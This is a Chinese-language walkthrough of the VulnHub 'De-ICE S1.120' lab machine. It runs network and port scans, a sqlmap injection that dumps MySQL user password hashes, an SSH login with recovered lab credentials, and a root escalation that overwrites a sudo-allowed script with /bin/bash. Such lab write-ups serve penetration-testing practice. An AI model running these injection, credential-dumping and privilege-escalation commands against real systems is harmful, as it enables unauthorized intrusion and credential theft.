vulnhub:https://www.vulnhub.com/entry/de-ice-s1120,10/
导入靶机,靶机默认IP192.168.1.120,所以新建一张仅主机网卡在1网段,将靶机和kali放在这张网卡下
查看kaliIP
192.168.1.128
扫描,发现靶机
arp-scan 192.168.1.0/24
使用nmap扫描靶机端口
nmap 192.168.1.120
发现五个端口,开启了FTP,SSH,HTTP/HTTPS,MySQL服务
按照常规思路访问web页面
使用SQLMAP工具尝试注入
python3 sqlmap.py -u http://192.168.1.120/products.php?id=1
成功发现网站存在SQL注入
获取数据库内的信息
经过一些查询发现mysql--user表中有Password字段
尝试爆破账号和密码,密码存在hash加密,使用SQLMAP默认方式爆破,因为有很多用户所以爆破会很慢
python3 sqlmap.py -u http://192.168.1.120/products.php?id=1 -D mysql -T user -C User,Password --dump
扫出来了一堆账户和密码,联系到之前看到开启了ssh服务,尝试登录,使用swarren:kotaku组合登录
尝试使用SUID提权
扫描一下可以利用的SUID文件
好像没什么能用的
看了一下网上的WP,ccoffee账户的家目录下有个可利用的文件
ccoffee:blahblah
切换到ccoffee账户,文件在家目录下的scripts文件夹中
接下来正式提权
mv getlogs.sh getlogs.sh.bak 备份文件
echo "/bin/bash" > getlogs.sh 写入一个/bin/bash到和原文件名一样的文件中
chmod +x getlogs.sh 加上执行权限
sudo ./getlogs.sh 执行文件